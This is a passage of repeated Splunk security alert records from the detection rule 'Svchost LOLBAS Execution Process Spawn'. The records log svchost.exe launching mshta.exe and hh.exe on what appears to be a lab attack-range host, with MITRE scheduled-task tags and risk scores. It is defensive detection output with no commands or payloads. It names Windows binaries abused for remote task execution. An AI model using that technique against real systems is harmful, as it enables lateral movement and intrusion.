malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:38:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:38:04", parent_process="unknown", parent_process_id="796", process="unknown", process_id="5708", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", parent_process="unknown", parent_process_id="736", process="unknown", process_id="5708", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", parent_process="unknown", parent_process_id="948", process="unknown", process_id="4620", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", parent_process="unknown", parent_process_id="736", process="unknown", process_id="4620", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:41", parent_process="unknown", parent_process_id="948", process="unknown", process_id="4436", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", parent_process="unknown", parent_process_id="736", process="unknown", process_id="4436", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:01", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:01", parent_process="unknown", parent_process_id="948", process="unknown", process_id="224", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:01", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:01", parent_process="unknown", parent_process_id="736", process="unknown", process_id="224", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:04", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="224", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="unknown", parent_process_id="948", process="unknown", process_id="1852", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", parent_process="unknown", parent_process_id="736", process="unknown", process_id="1852", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="unknown", parent_process_id="948", process="unknown", process_id="7824", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="unknown", parent_process_id="736", process="unknown", process_id="7824", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:30", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="7824", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="unknown", parent_process_id="948", process="unknown", process_id="7392", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="unknown", parent_process_id="736", process="unknown", process_id="7392", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="7392", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="unknown", parent_process_id="948", process="unknown", process_id="7388", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="unknown", parent_process_id="736", process="unknown", process_id="7388", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
